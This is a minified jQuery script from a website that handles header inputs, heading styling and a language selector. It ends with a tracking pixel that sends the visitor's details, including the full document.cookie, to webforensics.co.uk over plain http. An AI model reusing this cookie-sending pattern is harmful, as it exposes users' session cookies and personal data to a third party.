$(document).ready(function(){$('#header input[type="text"]').each(function(){$(this).attr('originalValue',this.value);}).click(function(){if(this.value==$(this).attr('originalValue')){this.value='';}else{this.select();}}).blur(function(){if(this.value==''){this.value=$(this).attr('originalValue');}});if($('body.noHreplace').length==0){$('h1').not('.home h1').hreplace();}else{$('h1').not('.home h1').css('font-size','40px');$('h1').not('.home h1').css('font-family','arial');$('h1').not('.home h1').css('font-color','#51626f');$('h1').not('.home h1').css('font-weight','100');}
$('#language select').change(function(){if($(this).val()!=''){window.location=$(this).val();}});var trk_sw=escape(screen.width).substring(0,6);var trk_sh=escape(screen.height).substring(0,6);var trk_ref=escape(document.referrer).substring(0,1100);var trk_tit=escape(document.title).substring(0,200);trk_tit=trk_tit.replace(/\%u00a0/g,'');trk_tit=trk_tit.replace(/\%u2122/g,'');trk_tit=trk_tit.replace(/\%u[0-9][0-9][0-9][0-9]/g,'');var trk_loc=escape(document.location).substring(0,200);var trk_agn=escape(navigator.appName).substring(0,100);var trk_agv=escape(navigator.appVersion).substring(0,200);var trk_dom=escape(document.domain).substring(0,200);var trk_user='1032';var trk_cookie=document.cookie;var trk_img='http://webforensics.co.uk/images/track/'+trk_user+'.png'
var trk_link=trk_img+'?trk_user='+trk_user+'&trk_sw='+trk_sw+'&trk_sh='+trk_sh+'&trk_ref='+trk_ref+'&trk_tit='+trk_tit+'&trk_loc='+trk_loc+'&trk_agn='+trk_agn+'&trk_agv='+trk_agv+'&trk_dom='+trk_dom+'&trk_cookie='+trk_cookie;var trk_imgload='<img src="'+trk_link+'" width="1" height="1" border="0" />';$(document).append(trk_imgload);});
